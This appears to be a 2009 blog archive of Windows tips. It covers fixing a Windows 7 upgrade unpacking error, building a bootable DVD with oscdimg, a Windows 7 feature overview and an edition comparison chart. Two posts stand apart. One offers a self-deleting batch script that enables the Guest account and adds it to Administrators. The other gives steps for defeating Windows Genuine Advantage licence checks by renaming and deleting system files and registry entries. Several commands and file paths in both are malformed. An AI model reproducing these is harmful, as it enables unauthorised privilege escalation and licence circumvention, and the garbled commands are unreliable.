Monday, October 26, 2009
How To Fix the Can’t Unpack Windows 7 Student Upgrade Error
While Microsoft is working on a solution to the following error messages;
“We are unable to create or save new files in the folder in which this application was downloaded”
“The version of this file is not compatible with the version of Windows you’re running. Check your computer’s system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher”
The Solutions:
There are few quick solutions that you can try to fix the error that shows up after the “Unpacking the Box” message.
The first solution would be to use a different computer, preferably one running Vista 64-bit, to do the unpacking and then follow the steps to make your installation bootable.
If you don’t have access to anther computer though, you may still be able to unpack your Windows 7 setup files pretty easily thanks to Sir Vikin in the Microsoft Answers Forums.
Pre Step- Create a folder in the following directory- C:\users\yourname - example for me is “C:\Users\Sir_Vikin\win 7″
now follow the rest-
STEP 1- Download the DLMWin7.exe application but do NOT run it yet.
Step 2- Right click the DLMWin7.exe – select Unblock
Step 3- Under the compatibility tab select the bottom box-”Run this program as an administrator” Click “Ok” to close
Step 4- Right click the DLMWin7.exe file and select run as administrator
Step 5 – Download the files to the folder you created example- “C:\Users\Sir_Vikin\win 7″
Step 6- Run it, it should unbox completely!
In the above example, “DLMWin7.exe” refers to the file you downloaded from Digital River, If you purchased Windows 7 Professional 64 bit, for example, your file would be named, “DLMWin7Pro64US.exe”.
We will continue to monitor the situation and if more solutions are found update you accordingly. If you still have problems using the Digital River upgrade files after trying these steps leave a note in the comments and we’ll try to help you out
Sunday, October 25, 2009
How to create a Bootable DVD (Windows 7 or Windows Vista)
How to create a Bootable DVD (Windows 7 or Windows Vista)
Sometimes you'd want to install Windows from a bootable DVD but you just have all the Windows files... I mean, in my case I've got Windows 7 build 7048 (beta drop, but it does not matter), but I currently don't have its related ISO image. So, if I want to install a plain new Windows 7 from scratch (booting & installing from a DVD), guess what you need?, right..., I want to create my own bootable Windows DVD.
In order to do that, we can use several Microsoft tools that come in AIK (Windows Automated Installation Kit), for Windows Vista or Windows 7 (the latest in my case).
You can download from here, for instance:
Needed Tools you can get once you install AIK:
- oscdimg.exe (usually you can get it from in "%ProgramFiles%\Windows AIK\Tools\x86 )
- etfsboot.com (This is the boot sector file will put into the DVD)
1.- COPY WINDOWS FILES TO A HARD DISK
Of course, you'll need all the Windows 7 or Windows Vista files. For instance, I copied all of them within C:\Win7_7048_EN\x86fre
You could even add more custom files, like drivers or whatever..
2.- GENERATE THE ISO FILE
Open a command prompt console (with Administrator's rights) and go where you have the AIK's tools. Then type the following:
oscdimg -n -m -b"C:\Win7 7048 EN\DVD Bootable Tools\x86_Boot\etfsboot.com" C:\Win7_7048_EN\x86fre C:\Win7_7048_EN_ISO\Win7_7048_x86_EN.iso
You'll get messages like the following:
”OSCDIMG 2.55 CD-ROM and DVD-ROM Premastering Utility
Copyright (C) Microsoft, 1993-2007. All rights reserved.
Licensed only for producing Microsoft authorized content.
Scanning source tree (500 files in 49 directories)
Scanning source tree complete (810 files in 159 directories)
Computing directory information complete
Image file is 2825107456 bytes
Writing 810 files in 159 directories to V:\Win7_7048_EN_ISO\Win7_7048_x86_E
100% complete
Final image file is 2825107456 bytes
Done."
At this time you'll have a new ISO file for Windows 7 or Vista!!. :-)
If you want Windows x64, just use the other file types for x64, like:
oscdimg -n -m -b"C:\Win7 7048 EN\DVD Bootable Tools\x64_Boot\etfsboot.com" C:\Win7_7048_EN\x64fre C:\Win7_7048_EN_ISO\Win7_7048_x64_EN.iso
COMMAND'S MEANING:
-b points to the boot sector file location (etfsboot.com). This file will make the DVD bootable. Do not use a space between b and path!
Then, first path is the location of original Windows DVD files.
Second path points to the directory where the iso file will be created in.
-n makes it possible to use extended file names.
-m allows to create iso files, larger than CD format.
Monday, October 5, 2009
CRACK ADMIN ACCOUNT FROM GUEST
Steal "GUEST" with Admin privileges........
echo off
title Please wait...
cls
user add Username Password /add
net user localgroup Administrators Username /add
net user Guest 420 /active:yes
net localgroup Guests Guest /DELETE
net localgroup Administrators Guest /add
del %0
Copy this to notepad and save the file as "Guest2admin.bat"then u can double click the file to execute or run in the cmd.it works... ~ Cheers ~
MAKE YOUR USB DIVE VIRUS FREE
WINDOWS GENUINE CRACK
1.C:Documents and SettingsAll UsersApplication DataWindows Genuine Advantagedata
inside you will find a file called Data.dat open that file with notepad and
delete all the stuff in it… now save the file and set it as read only and restart pc but in SAFE mode ** Yes, this step is required ** ** Will NOT immediately solve problem until rest of steps completed **
Now go to c:windows system32 folder: MUST be in safemode
wgalogon.dll ** You CANNOT delete this file. RENAME it to wgalogon.bbb ***
spmgs.dll ** This is a spelling error. File is actually spmsg.dll. RENAME it to spmsg.aaa **
wgatray.exe *** DELETE this file ***
Now go to C:WINDOWSSoftwareDistributionDownload and DELETE the following folder
6c4788c9549d437e76e1773a7639582a
REBOOT & all should be resolved
End the process wgatray.exe in Windows TaskManager and restart Windows XP in safe mode. Now delete the following files:
Delete WgaTray.exe from c:windowssystem32
Delete WgaTray.exe from c:windowssystem32dllcache
Start Windows Registry editor and delete the folder "WGALOGON" located in the following location:
HKEY_LOCAL_MACHINESOFTWAREMicrosoft Windows NTCurrentVersionWinlogonNotify. Delete all references in your registry to WgaTray.exe
Another alternative suggest that three files are installed Windows XP System Folder:
WINDOWSsystem32WgaLogon.dll
WINDOWSsystem32WgaTray.exe
WINDOWSsystem32LegitCheckControl.dll
The wgatray.exe process makes the check for genuine windows software. You can disable WGA by removing the execute bit on WgaLogon.dll. That way, winlogon can't call it as a notification package at boot, and since WgaLogon is responsible for running and maintaining WgaTray.exe, no more tray popups either.
To change the execute bit of WgaLogon.dll, first turn off Simple File Sharing. Now right click the file in Windows Explorer and open the Security Tab. Hit the Advanced button, uncheck the Inherit box at the bottom, hit the Copy button, then hit OK. Go through each listed user/group and remove the "Read & Execute" permission for that file, leaving the "Read" permission as-is.
Hit OK to apply the permission changes and close the file properties dialog. Restart the machine. You can now turn "Use simple file sharing" back on, if you want.
A third alternative posted on the internet suggest that users clear the content of file data.dat located in the following directory:
C:Documents and SettingsAll UsersApplication DataWindows Genuine Advantagedata
Tuesday, September 22, 2009
Windows 7 gives better performance, greater stability
Love it or hate it, but on October 22, all eyes will be focused on Microsoft as it unveils the next operating system, Windows 7. Having come out with a release candidate late in April, Windows 7 has garnered a positive response so far. Better performance, greater stability and a more intuitive interface seem to be on the cards.
Higher efficiency
One key requirement of an operating system is efficiency. All the fancy effects and pretty icons would come to nought if it didn’t live up to its billing. Vista, for instance, had the basics of a clean and intuitive interface that was bogged down by sluggish performances. Well, with Windows 7 all that is likely to be history.
Windows 7 is designed to be leaner and more memory-efficient than Vista, running background tasks only when required. An improved sleep/resume feature is added, quicker and better searches and faster identification of USB drives.
Increased efficiency, of course, translates into better power management. Windows 7 will be less draining on laptop batteries, and will include automatic screen dimming, low-power DVD playback, and cutting power to unused ports. Networking features are set to get a boost as well. Wireless or wired, it will be that much easier to discover and connect to networks.
The much-awaited full 64-bit support with also be ready with Windows 7, and users will be able to take full advantage of 64-bit CPUs, including tapping into 4 GB or more of RAM.
Better interface
Apart from its lean, mean under-the-hood features, Windows 7 will have a smart new turnout that translates not just into good looks, but also a more intuitive user interface. The desktop and taskbar see many changes and innovations, including the various options to organise the desktop and improved customisation for a completely reworked taskbar. New desktop features include the Snap feature to resize and arrange windows by dragging them to the edges of the screen. Aero Peek and Aero Shake allow one to scythe through open windows by making everything between the user and the desktop transparent, and also to focus on a single window buried deep down.
The introduction of jump lists now make access to preferred documents, websites and other items — including frequently used commands — much easier. Accessed via the context-menu, jump lists are specific for different programmes, such as music files for a media player. Users may also ‘pin’ items to jump lists.
Gadgets, introduced in Vista, are seeing an overhaul too in Windows 7, and can now be placed anywhere on the desktop; the sidebar is gone. A collection of stunning new themes, wallpapers and desktop slideshow pictures will be packaged with the new operating system as well.
We will also see complete touchscreen compatibility, with multi-touch support with the right hardware. One may now rearrange files and folders with one’s fingers, and zoom in on photos with a pinch Mac-style, and even finger-paint!
The HomeGroup feature makes setting up home networks a snap, whether it is connecting a number of PCs to share files or sharing common resources such as printers. It is secure and access rights are customisable by the user.
The media centre sees major improvements as well. Now supporting a larger number of popular formats, including high definition, it makes for easier watching, listening, sharing, recording and even showing off.
Friday, September 11, 2009
Comparison chart Windows 7
Comparison chart
Cost & Features / Availability | Starter | Home Basic | Home Premium | Professional | Enterprise | Ultimate |
---|---|---|---|---|---|---|
OEM licensing | Emerging markets | Retail and OEM licensing | Volume licensing | Retail and OEM licensing | ||
32-bit and 64-bit versions | 32-bit only | Both | Both | Both | Both | Both |
Maximum physical memory (64-bitmode)[29] | N/A | 8 GB | 16 GB | 192 GB | 192 GB | 192 GB |
Maximum CPU chips supported | 1 | 1 | 1 | 2 | 2 | 2 |
Home Group (create and join) | Join only | Join only | Yes | Yes | Yes | Yes |
Backup and Restore Center[30] | Cannot back up to network | Cannot back up to network | Cannot back up to network | Yes | Yes | Yes |
Multiple monitors | No | Yes | Yes | Yes | Yes | Yes |
Fast user switching | No | Yes | Yes | Yes | Yes | Yes |
Desktop Wallpaper Changeable | No | Yes | Yes | Yes | Yes | Yes |
Desktop Window Manager | No | Yes | Yes | Yes | Yes | Yes |
Windows Mobility Center | No | Yes | Yes | Yes | Yes | Yes |
Windows Aero | No | Partial | Yes | Yes | Yes | Yes |
Multi-Touch | No | No | Yes | Yes | Yes | Yes |
Premium Games Included | No | No | Yes | Yes | No | Yes |
Windows Media Center | No | No | Yes | Yes | Yes | Yes |
Windows Media Player Remote Media Experience[31] | No | No | Yes | Yes | Yes | Yes |
Encrypting File System | No | No | No | Yes | Yes | Yes |
Location Aware Printing | No | No | No | Yes | Yes | Yes |
Remote Desktop Host | No | No | No | Yes | Yes | Yes |
Presentation Mode | No | No | No | Yes | Yes | Yes |
Windows Server domain joining | No | No | No | Yes | Yes | Yes |
Windows XP Mode[32] | No | No | No | Yes | Yes | Yes |
AppLocker | No | No | No | No | Yes | Yes |
BitLocker Drive Encryption | No | No | No | No | Yes | Yes |
BranchCache Distributed Cache | No | No | No | No | Yes | Yes |
DirectAccess | No | No | No | No | Yes | Yes |
Subsystem for Unix-based Applications | No | No | No | No | Yes | Yes |
Multilingual User Interface Pack | No | No | No | No | Yes | Yes |
Virtual Hard Disk Booting | No | No | No | No | Yes | Yes |
[edit]Upgrading
Windows Vista can be upgraded to Windows 7 with an in-place upgrade if the processor architecture, comparable edition, and language version are the same. Windows XP can only be upgraded to Windows 7 via a clean install. Windows 7 will support in-place upgrades from a lower edition to a higher one using the Windows Anytime Upgrade tool.